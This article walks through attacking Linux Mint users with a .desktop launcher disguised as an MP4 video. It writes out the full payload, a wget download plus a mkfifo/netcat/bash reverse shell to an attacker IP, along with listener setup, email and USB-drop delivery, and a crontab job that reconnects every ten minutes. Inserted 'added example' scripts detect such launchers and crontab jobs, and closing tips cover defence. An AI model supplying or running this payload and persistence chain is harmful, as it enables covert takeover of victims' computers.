What appears to be an ordinary MP4 may have been designed by an attacker to compromise your Linux Mint operating system. Opening the file will indeed play the targeted video, but it will also silently establish a connection to the attacker's system.
Although this article uses Linux Mint as an example, the attack exploits a weakness shared by several Linux file managers. The GIF below demonstrates the attack.
Two files are extracted in the GIF. The first (real_video.mp4) is a real MP4 from a movie trailer. The second file (fake_video.mp4) is a .desktop file, configured to resemble a normal MP4 in this file manager. What we cannot see in the GIF is the Netcat connection that is made to the attacker's system when fake_video.mp4 is opened. The target believes that fake_video.mp4 is legitimate and has no idea that the operating system has just been compromised.
The .desktop file extension is used on Linux systems to create application launchers. Linux Mint users can look at the files in the /usr/share/applications/ folder for some examples.
$ ls -l /usr/share/applications/*.desktop
-rw-r--r-- 1 root root   125 Nov  4  2017 /usr/share/applications/apturl.desktop
-rw-r--r-- 1 root root  8754 Nov 28 04:55 /usr/share/applications/blueberry.desktop
-rw-r--r-- 1 root root  1383 Jan 11 11:41 /usr/share/applications/bluetooth-sendto.desktop
-rw-r--r-- 1 root root   363 Mar 21 09:45 /usr/share/applications/cinnamon2d.desktop
-rw-r--r-- 1 root root   448 Dec  6 05:22 /usr/share/applications/cinnamon-color-panel.desktop
-rw-r--r-- 1 root root   300 Dec  6 05:22 /usr/share/applications/cinnamon-control-center.desktop
-rw-r--r-- 1 root root   463 Mar 21 09:45 /usr/share/applications/cinnamon.desktop
-rw-r--r-- 1 root root   496 Dec  6 05:22 /usr/share/applications/cinnamon-display-panel.desktop
-rw-r--r-- 1 root root   200 Mar 21 09:45 /usr/share/applications/cinnamon-killer-daemon.desktop
-rw-r--r-- 1 root root   272 Mar 21 09:45 /usr/share/applications/cinnamon-menu-editor.desktop
-rw-r--r-- 1 root root   450 Dec  6 05:22 /usr/share/applications/cinnamon-network-panel.desktop
-rw-r--r-- 1 root root   504 Dec  6 05:22 /usr/share/applications/cinnamon-online-accounts-panel.desktop
-rw-r--r-- 1 root root 11580 Mar 21 09:45 /usr/share/applications/cinnamon-onscreen-keyboard.desktop
-rw-r--r-- 1 root root   504 Dec  6 05:22 /usr/share/applications/cinnamon-region-panel.desktop
-rw-r--r-- 1 root root   433 Dec 11 03:24 /usr/share/applications/cinnamon-screensaver.desktop
-rw-r--r-- 1 root root 12473 Mar 21 09:45 /usr/share/applications/cinnamon-settings-applets.desktop
...
-rw-r--r-- 1 root root   506 Dec 15  2017 /usr/share/applications/seahorse.desktop
-rw-r--r-- 1 root root 10609 Mar 26  2018 /usr/share/applications/simple-scan.desktop
-rw-r--r-- 1 root root  8996 May 10  2018 /usr/share/applications/synaptic.desktop
-rw-r--r-- 1 root root   518 Apr  3  2018 /usr/share/applications/system-config-printer.desktop
-rw-r--r-- 1 root root 10062 Mar 25 07:28 /usr/share/applications/thunderbird.desktop
-rw-r--r-- 1 root root   820 Nov 30 08:53 /usr/share/applications/timeshift-gtk.desktop
-rw-r--r-- 1 root root 11701 Aug  2  2017 /usr/share/applications/tomboy.desktop
-rw-r--r-- 1 root root  4493 Feb  6  2018 /usr/share/applications/transmission-gtk.desktop
-rw-r--r-- 1 root root  3617 Apr 10  2018 /usr/share/applications/vim.desktop
-rw-r--r-- 1 root root  9870 Oct  6  2018 /usr/share/applications/vlc.desktop
-rw-r--r-- 1 root root   992 Dec 10 11:48 /usr/share/applications/xdg-desktop-portal-gtk.desktop
-rw-r--r-- 1 root root  4526 Dec 11 06:10 /usr/share/applications/xed.desktop
-rw-r--r-- 1 root root  9762 Dec 11 06:12 /usr/share/applications/xplayer.desktop
-rw-r--r-- 1 root root  8056 Dec 11 06:15 /usr/share/applications/xreader.desktop
-rw-r--r-- 1 root root  5309 Dec 11 06:18 /usr/share/applications/xviewer.desktop
-rw-r--r-- 1 root root  3780 Dec 17 05:45 /usr/share/applications/yelp.desktop
Viewed in Nemo, Linux Mint's built-in file manager, the same .desktop files are displayed as clickable buttons.
Running cat on one of the operating system's legitimate .desktop files displays the following.
$ cat /usr/share/applications/cinnamon-settings-calendar.desktop
[Desktop Entry]
Icon=cs-date-time
Exec=cinnamon-settings calendar
Type=Application
OnlyShowIn=X-Cinnamon;
Categories=Settings;
The most important keys to note are Icon= and Exec=. The Icon value determines the icon used to display the .desktop file. The Exec value determines the command(s) executed when the target clicks the .desktop file. In this case, clicking the file runs the command cinnamon-settings with the argument calendar, which opens the "Date and Time" settings window.
An attacker can abuse this functionality to control both how the .desktop file is displayed to the user in the file manager and which program(s) start when the file is clicked.
Which operating systems are affected?
Several notable desktop environments (DEs) are affected by this problem, including GNOME, Cinnamon, MATE, KDE, XFCE4 and LXDE. Although this is far from an exhaustive list of available DEs, these are among the most popular.
Each DE uses a different file manager by default; GNOME, for example, uses Nautilus and KDE uses Dolphin. Neither of those two file managers is vulnerable to this attack. But keep in mind that it is possible to install and use multiple file managers on one operating system, just as two different web browsers can be installed side by side, so a GNOME target with Nautilus installed may still be using a different, vulnerable file manager.
The purpose of this article is to shed some light on the vulnerability in Nemo, Cinnamon's default file manager. Like the Thunar file manager on XFCE4 systems, Nemo is vulnerable to this attack.
In my short series of tests against popular operating systems, this is what I could determine, listed in OS / DE / File Manager format.
Systems not affected:
- Ubuntu 18.04 / GNOME / Nautilus
- Debian 10 / GNOME / Nautilus
- elementary OS 5 / Pantheon / Pantheon Files
- Manjaro 18 / KDE / Dolphin
Systems affected:
- Linux Mint 19.2 / Cinnamon / Nemo
- Xubuntu 18.04 / XFCE4 / Thunar
- Fedora 30 / MATE / Caja
- MX Linux / XFCE4 / Thunar
How to identify whether a target's file manager is vulnerable
It is not easy to determine whether the target uses a vulnerable file manager, especially if the attacker knows nothing about the target's operating system. However, if the attacker shares a Wi-Fi network with the target, it is possible to observe traffic sent to and from the operating system. The DNS requests of a Linux Mint operating system look like this:
Similarly, MX Linux systems use their own repositories (shown below) when retrieving system updates.
Determining the DE or file manager may not be possible unless the target shares identifying information on social media or elsewhere. Be sure to leave tips and ideas for enumerating this information in the comments!
We need to set up a simple HTTP server on Kali to host the real_video.mp4 file. When the target clicks fake_video.desktop, real_video.mp4 is downloaded and played automatically. Start by installing Python3 on your Kali system as root.
~# apt-get update && apt-get install python3
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3 is already the newest version (3.7.2-1).
python3 set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Then use the mkdir command to create a temporary folder for the attack files we are about to create.
~# mkdir -p /tmp/pythonServer/videos
Then change into the new videos folder.
~# cd /tmp/pythonServer/videos/
Step 2: Install youtube-dl
youtube-dl is a cross-platform command-line tool for downloading YouTube videos. The version of youtube-dl in the Kali Linux repository is usually somewhat outdated, so consult the GitHub repo for the latest version. Use the command below to install it.
~# curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1709k  100 1709k    0     0  70872      0  0:00:24  0:00:24 --:--:--  406k
Then make the new youtube-dl binary executable with the chmod command.
~# chmod a+rx /usr/local/bin/youtube-dl
Step 3: Download a YouTube video
In real scenarios, a relevant video should be used to trick the target into believing that the fake_video file is in fact a real video. For demonstration purposes, I am using the rickroll.
~# youtube-dl --restrict-filenames -f 18 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'
[youtube] dQw4w9WgXcQ: Downloading webpage
[youtube] dQw4w9WgXcQ: Downloading video info webpage
[youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_
[youtube] dQw4w9WgXcQ: Downloading js player vflptN-I_
[download] Destination: Rick_Astley_-_Never_Gonna_Give_You_Up_Official_Music_Video-dQw4w9WgXcQ.mp4
[download] 100% of 15.18MiB in 00:07
The file name likely contains awkward characters, so rename the video file for simplicity. Use the following mv command with a wildcard (*) to rename it.
~# mv Rick*.mp4 real_video.mp4
The ls command can then be used to view the contents of the folder and the renamed file.
~# ls -l
-rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Use a text editor of your choice, such as Gedit, Geany, Vim or nano, to create a new "fake_video.desktop" file. In the example below, nano is used.
~# nano fake_video.desktop
Then copy the text below to the new file. The .desktop file extension is vital; the attack will not work without it.
#!/usr/bin/env xdg-open
[Desktop Entry]
Encoding=UTF-8
Name=fake_video.mp4
Exec=/usr/bin/wget 'http://192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/xdg-open /tmp/real_video.mp4; /usr/bin/mkfifo /tmp/f; /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 &
Terminal=false
Type=Application
Icon=video-x-generic
Several commands are executed (Exec=), concatenated on one line and separated by semicolons. I will split the one-liner into parts to explain each command.
- /usr/bin/wget 'http://192.168.1.XX/real_video.mp4' -O /tmp/real_video.mp4; – Wget downloads the real_video.mp4 file from the attacker's system to the target. It is stored in the /tmp folder under the same file name. Change the 192.168.1.XX address in the payload to the IP address of the attacker's Kali system.
- /usr/bin/xdg-open /tmp/real_video.mp4; – The xdg-open command opens files with the target operating system's preferred application. If the target prefers VLC over MPV or another Linux video player, real_video.mp4 is played in VLC automatically. Opening the video in the preferred media player will hopefully keep the target from noticing fake_video.desktop.
- /usr/bin/mkfifo /tmp/f; – Mkfifo creates a named pipe that connects the input and output of the following Netcat command to the attacker's system:
- /bin/nc 192.168.1.XX 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 & – Netcat and Bash are used (with the aforementioned pipe) to connect to the attacker's system (again, change the XX in the IP address to that of the attacker). The port number (1234) is arbitrary and can be any number between 1 and 65535.
The Icon= image can also be changed here. Icon file names can be found in the /usr/share/icons/Mint-Y/mimetypes/128/ folder. The file extension (.png) can be omitted when creating .desktop files, but omitting it is not required. Any file in the /usr/share/icons/ folder can be used as a .desktop file icon: for example, text files (text-x-generic), ZIP files (package-x-generic) and any other file type with a matching PNG in the icons/ directory. There is a lot of room for creativity in social engineering attacks here (a fake ZIP file is shown below).
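From the defender's side, the three keys just described (Name=, Exec=, Icon=) are also the indicators that give such a launcher away: a Type=Application entry whose Name= ends in a media extension, whose Exec= chains shell commands or calls pipe and network tooling, and whose Icon= borrows a generic file-type icon. The following audit script is an added example, not code from the article or from any file manager project; it parses .desktop files with a minimal reader of the [Desktop Entry] group and reports those findings for a single file or for every *.desktop under a directory (a mounted USB stick, ~/Downloads, an extracted ZIP). The two embedded samples are constructed: the benign one reproduces the cinnamon-settings-calendar launcher quoted above, and the other is modelled on the article's payload with the documentation address 192.0.2.10 in place of a real host.

```python
"""Audit .desktop launchers for the file-masquerade pattern (added example)."""
import re
import sys
from pathlib import Path

# Extensions an attacker would put in Name= to make a launcher look like a data file.
DATA_EXTENSIONS = (".mp4", ".mkv", ".avi", ".mp3", ".pdf", ".zip", ".txt",
                   ".jpg", ".png", ".doc", ".docx", ".odt")

# Generic MIME-type icon families; real application launchers use an application icon.
MIME_ICON_PREFIXES = ("video-", "audio-", "image-", "text-", "package-")

# Tokens that have no business in a launcher claiming to open a video or document.
SUSPICIOUS_EXEC = [
    (re.compile(r"[;&|]"), "shell command chaining (Exec= is not a shell line)"),
    (re.compile(r"\bmkfifo\b"), "named pipe creation"),
    (re.compile(r"\b(nc|ncat|netcat)\b"), "netcat"),
    (re.compile(r"\b(ba)?sh\s+-i\b"), "interactive shell"),
    (re.compile(r"\b(wget|curl)\b"), "downloader"),
    (re.compile(r"/dev/tcp/"), "bash network redirect"),
]


def parse_desktop_entry(text):
    """Return the keys of the [Desktop Entry] group as a dict; other groups are ignored."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):        # blank lines, comments and a shebang
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def audit_desktop_entry(text):
    """Return a list of findings for one .desktop file; an empty list means it looks normal."""
    entry = parse_desktop_entry(text)
    findings = []
    name = entry.get("Name", "")
    if name.lower().endswith(DATA_EXTENSIONS):
        findings.append(f"Name={name!r} ends in a data-file extension but this is a launcher")
    exec_line = entry.get("Exec", "")
    for pattern, label in SUSPICIOUS_EXEC:
        if pattern.search(exec_line):
            findings.append(f"Exec contains {label}: /{pattern.pattern}/")
    icon = entry.get("Icon", "")
    if entry.get("Type") == "Application" and icon.startswith(MIME_ICON_PREFIXES):
        findings.append(f"Icon={icon!r} is a generic file-type icon, unusual for an application launcher")
    return findings


def audit_directory(directory):
    """Audit every *.desktop file under a directory; returns {path: findings}."""
    results = {}
    for path in Path(directory).rglob("*.desktop"):
        results[str(path)] = audit_desktop_entry(path.read_text(errors="replace"))
    return results


# Constructed sample: the legitimate Cinnamon launcher shown earlier in the article.
BENIGN_ENTRY = """\
[Desktop Entry]
Icon=cs-date-time
Exec=cinnamon-settings calendar
Type=Application
OnlyShowIn=X-Cinnamon;
Categories=Settings;
"""

# Constructed sample modelled on the article's payload; 192.0.2.10 is a documentation address.
MASQUERADE_ENTRY = """\
#!/usr/bin/env xdg-open
[Desktop Entry]
Encoding=UTF-8
Name=fake_video.mp4
Exec=/usr/bin/wget 'http://192.0.2.10/real_video.mp4' -O /tmp/real_video.mp4; /usr/bin/mkfifo /tmp/f; /bin/nc 192.0.2.10 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1 &
Terminal=false
Type=Application
Icon=video-x-generic
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:                           # python3 audit_desktop.py /media/user/USB
        for path, findings in audit_directory(sys.argv[1]).items():
            print(path, "->", findings or "ok")
    else:
        for label, sample in (("benign", BENIGN_ENTRY), ("masquerade", MASQUERADE_ENTRY)):
            print(label, "->", audit_desktop_entry(sample) or "ok")
```

The chaining check is the cheapest and most reliable of the indicators: the Exec key is defined as a program plus arguments, so a semicolon, pipe or ampersand in it is already a sign that someone wants a shell rather than a launcher, regardless of which tools are named.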
Change the permissions of fake_video.desktop with the chmod command to make it executable.
~# chmod +x fake_video.desktop
The new permissions can be verified by listing the directory contents. Note the execute bits (-rwxr-xr-x).
~# ls -l
-rwxr-xr-x 1 root root      353 Apr 12 06:27 fake_video.desktop
-rw-r--r-- 1 root root 15915462 Dec 10 01:55 real_video.mp4
Python3 can start a web server on port 80 that makes the real_video.mp4 in this directory available to everyone on the network. Alternatively, this web server can be run on a virtual private server for remote targets.
~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The Python3 terminal must remain open until the target clicks on the fake_video.desktop file. If the Python3 server is not accessible when the target opens the fake_video, no video will be played, but the target's computer will still establish the Netcat connection.
Step 7: Launch the Netcat Listener
Netcat will listen (-l) on any available IPv4 interface using port (-p) 1234. This port number is arbitrary, but don't forget to change it to match the port used in the fake_video.desktop Exec= command in Step 5. The -vv option prints more verbose output, which can be useful when debugging connections.
~ # nc -vv -l -p 1234
With Python3 and Netcat set up, the attacker can deliver fake_video.desktop to the target. I have described two simple delivery methods below, but this is far from an exhaustive list of attack vectors; other tactics are possible if the attacker knows more about the target.
Email is a good vector for sharing files. If the target's operating system has been discovered, or it is known that Linux systems are deployed in the workplace, email delivery is an ideal option. In this scenario, compressing the file(s) with zip is necessary to prevent email clients and web browsers from revealing the .desktop file extension when the file is shared.
It may be desirable to include many .desktop payloads in the ZIP sent to the target for a convincing social engineering attack, or perhaps to mix real files in with the fake videos.
First make sure that zip is installed, because it is not included in all versions of Kali.
~# apt-get install zip
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  zip
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 234 kB of archives.
After this operation, 623 kB of additional disk space will be used.
Fetched 234 kB in 6s (37.4 kB/s)
Selecting previously unselected package zip.
(Reading database ... 175224 files and directories currently installed.)
Preparing to unpack .../zip_3.0-11+b1_amd64.deb ...
Unpacking zip (3.0-11+b1) ...
Setting up zip (3.0-11+b1) ...
Processing triggers for man-db (2.8.5-2) ...
In the videos/ folder, use the zip command below to compress all files in the folder.
~# zip -r videos.zip ../videos/
  adding: ../videos/ (stored 0%)
  adding: ../videos/real_video.mp4 (deflated 0%)
  adding: ../videos/fake_video.desktop (deflated 33%)
Zip recursively (-r) compresses all files in the ../videos/ folder into a "videos.zip" file. When that is done, the videos.zip file can be emailed to the target(s).
Option 2: USB Drop
Readers may know that I am a fan of USB drop attacks. Nearly 50% of all USB drives found in the wild are picked up, plugged into a computer and inspected by unsuspecting targets. The lone USB drive is an excellent attack vector because it specifically targets the computer, whereas an email attachment might be opened on the target's smartphone. When the target inserts the USB drive into their machine, Nemo automatically attempts to mount it and displays fake_video.desktop as "fake_video.mp4", so no file compression is required.
For more on the science of targeted social engineering attacks, see "Hack WPA2 Wi-Fi Passwords Using USB Dead Drops." Similarly, USB drives shared in the workplace can be configured to mimic or clone the real files on the drive and swap them for malicious payloads.
To perform a USB drop attack, start by inserting the USB drive intended for the target into the Kali system. Then mount the USB drive and use the cp command below to copy the fake_video.desktop to the drive.
~# cp /tmp/pythonServer/videos/*.desktop /media/root/USB_NAME_HERE/
Then eject the USB drive and leave it somewhere only the intended target(s) will find it.
When fake_video.desktop is clicked, a connection is established with the Netcat listener (shown below).
~# nc -vv -l -p 1234
listening on [any] 1234 ...
connect to [192.168.1.XX] from () [192.168.1.78] 37538
target_user@Linux-Mint:~$
At this point, it is usually a good idea to establish some degree of persistence on the target computer. In the event that the original Netcat connection is lost, it may be desirable to have a way to reconnect to the compromised Linux Mint device. A simple form of persistence can be configured using crontab.
Cron is a task scheduler found in the Mint and Ubuntu operating systems. Cron tasks are often used by system administrators to automate repetitive tasks, such as making weekly backups and performing a specific task when the operating system is restarted.
To ensure that Netcat re-establishes the connection to the attacker's system, echo the commands below into crontab. With these commands, the Mint device connects to the attacker's server every ten minutes.
echo '*/10 * * * * /usr/bin/mkfifo /tmp/v; /bin/nc 192.168.1.XX 9999 < /tmp/v | /bin/bash -i > /tmp/v 2>&1 &' | crontab -
These are the same mkfifo and Netcat commands used in the fake_video.desktop payload in Step 5. Start a new Netcat listener on the Kali system to receive connections from the target's machine.
~# nc -vv -l -p 9999
As long as the target is connected to the same network, the compromised device connects to the Netcat listener every ten minutes. If the listener is not active, the connection attempt fails and is retried at the next interval.
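A crontab entry like the one above is what an incident responder should be looking for on a Mint or Ubuntu host after a suspected compromise: a job with a short */N schedule whose command creates a named pipe, points netcat at a host and port, or starts an interactive shell. The script below is an added example (not from the article) that parses crontab text, such as the output of `crontab -l` for each user or a file from /var/spool/cron/crontabs/, and reports each matching job with its line number, schedule and the reasons it was flagged. The embedded crontab is constructed for the example and uses the documentation address 192.0.2.10.

```python
"""Audit crontab entries for beaconing reverse-shell jobs (added example)."""
import re
import sys
from dataclasses import dataclass, field

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week

REVERSE_SHELL_INDICATORS = [
    (re.compile(r"\bmkfifo\b"), "named pipe creation"),
    (re.compile(r"\b(nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"), "netcat connecting to a host and port"),
    (re.compile(r"\b(ba)?sh\s+-i\b"), "interactive shell"),
    (re.compile(r"/dev/tcp/"), "bash network redirect"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped into a shell"),
]


@dataclass
class CronFinding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def split_cron_line(line):
    """Return (schedule, command) for a job line; None for comments, blanks and VAR=value lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):                          # @reboot, @hourly, ...
        parts = stripped.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", stripped):  # SHELL=/bin/sh, MAILTO=root
        return None
    parts = stripped.split(None, CRON_FIELDS)
    if len(parts) < CRON_FIELDS + 1:
        return None                                       # malformed line, nothing runs
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def minutes_between_runs(schedule):
    """Interval in minutes for '*/N * * * *' schedules; None for any other shape."""
    match = re.fullmatch(r"\*/(\d+) \* \* \* \*", schedule)
    return int(match.group(1)) if match else None


def audit_crontab(text):
    """Return a CronFinding for every job line that matches at least one indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = [label for pattern, label in REVERSE_SHELL_INDICATORS if pattern.search(command)]
        if not reasons:
            continue
        interval = minutes_between_runs(schedule)
        if interval is not None and interval <= 15:
            reasons.append(f"runs every {interval} minutes (call-back cadence)")
        findings.append(CronFinding(line_no, schedule, command, reasons))
    return findings


# Constructed sample crontab for this example; 192.0.2.10 is a documentation address.
SAMPLE_CRONTAB = """\
# constructed sample crontab, not taken from a real system
SHELL=/bin/sh
0 2 * * 0 /usr/local/bin/backup.sh --weekly
@reboot /usr/bin/syncthing
*/10 * * * * /usr/bin/mkfifo /tmp/v; /bin/nc 192.0.2.10 9999 < /tmp/v | /bin/bash -i > /tmp/v 2>&1 &
"""

if __name__ == "__main__":
    # python3 audit_cron.py /var/spool/cron/crontabs/alice   (or pipe `crontab -l` to a file)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for f in audit_crontab(text):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}")
        for reason in f.reasons:
            print("   -", reason)
```

Only the one job in the sample is reported; the weekly backup and the @reboot entry pass through untouched, which is the behaviour you want when running this across every user's crontab on a busy host.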
How to Protect Yourself from .desktop Attacks
- File Managers – The Nemo and Thunar file managers found in Cinnamon and XFCE4 are vulnerable to this type of attack. Try the Nautilus or Dolphin file managers instead; they can be installed using the command below.
~# apt-get install nautilus dolphin
After installation, open the settings for preferred applications.
Change the File Manager to "Files" with the blue file icon; this is Nautilus.
Clicking on folders now opens Nautilus rather than Nemo, and fake_video.desktop appears in its true form in this file manager.
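To confirm that the switch actually took effect (and to audit other machines without clicking through a dialog), check which desktop id is registered as the handler for the inode/directory MIME type. The script below is an added example, not from the article: it parses a mimeapps.list body, which is the file the XDG default-applications mechanism uses (assumption: Cinnamon's Preferred Applications dialog writes the choice to ~/.config/mimeapps.list, which takes precedence over /usr/share/applications/mimeapps.list), and classifies the handler using only the results reported in this article. The two samples are constructed to show the state before and after the change.

```python
"""Report the default directory handler from mimeapps.list (added example)."""
from pathlib import Path

# Classification taken from the article's test results, nothing more.
RENDERS_DESKTOP_NAME = {"nemo.desktop", "thunar.desktop", "caja.desktop"}
SHOWS_REAL_FILENAME = {"nautilus.desktop", "org.gnome.Nautilus.desktop",
                       "dolphin.desktop", "org.kde.dolphin.desktop"}


def parse_mimeapps(text):
    """Return {section: {mime: [desktop ids]}} for a mimeapps.list body."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current and "=" in line:
            mime, _, ids = line.partition("=")
            sections[current][mime.strip()] = [i.strip() for i in ids.split(";") if i.strip()]
    return sections


def default_handler(text, mime="inode/directory"):
    """First desktop id listed for the MIME type, preferring [Default Applications]."""
    sections = parse_mimeapps(text)
    for section in ("Default Applications", "Added Associations"):
        ids = sections.get(section, {}).get(mime)
        if ids:
            return ids[0]
    return None


def classify(desktop_id):
    """Say what the article found for this file manager, or that it was not tested."""
    if desktop_id in RENDERS_DESKTOP_NAME:
        return "affected: displays Name= of .desktop files as if it were the file name"
    if desktop_id in SHOWS_REAL_FILENAME:
        return "not affected: displays the real .desktop file name"
    return "unknown: not covered by the article's tests"


def check_paths(paths=("~/.config/mimeapps.list", "/usr/share/applications/mimeapps.list")):
    """Walk the usual locations in precedence order; return (path, handler, verdict) or None."""
    for p in paths:
        path = Path(p).expanduser()
        if path.is_file():
            handler = default_handler(path.read_text(errors="replace"))
            if handler:
                return str(path), handler, classify(handler)
    return None


# Constructed samples: a Mint default, and the same file after choosing Nautilus.
SAMPLE_BEFORE = """\
[Default Applications]
inode/directory=nemo.desktop
text/plain=xed.desktop
"""

SAMPLE_AFTER = """\
[Default Applications]
inode/directory=nautilus.desktop;

[Added Associations]
inode/directory=nemo.desktop;nautilus.desktop;
"""

if __name__ == "__main__":
    for label, sample in (("before", SAMPLE_BEFORE), ("after", SAMPLE_AFTER)):
        handler = default_handler(sample)
        print(f"{label}: {handler} -> {classify(handler)}")
    live = check_paths()
    print("this system:", live if live else "no inode/directory handler set in mimeapps.list")
```

The XDG specification lists further lookup locations (per-desktop variants and /usr/local/share/applications); the two paths above are the ones that matter on a stock Mint install, and `xdg-mime query default inode/directory` gives the same answer from the shell if you only want the id.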
- Sandboxes – It is possible to sandbox specific applications and processes with tools such as Firejail. Firejail reduces the risk of security breaches by using lightweight virtualization technology to isolate applications and confine them to sandboxed (container) environments. The GIF below demonstrates opening an unsafe file in a heavily sandboxed environment.
For more information about hardening Ubuntu-based operating systems such as Linux Mint, see "Using Ubuntu as Your Primary Operating System, Part 3 (Application Hardening & Sandboxing)."
- Right-click – Rather than double-clicking random files, right-click them first. In the case of this attack, right-clicking reveals the file for what it is: the "Open With" options offered for fake_video.mp4 are text editors, not video players such as VLC or MPV. That is because the operating system knows it is a .desktop file containing text.
If you liked this article, follow me on Twitter @tokyoneon_ and GitHub. For questions and comments, send me a message or leave a comment.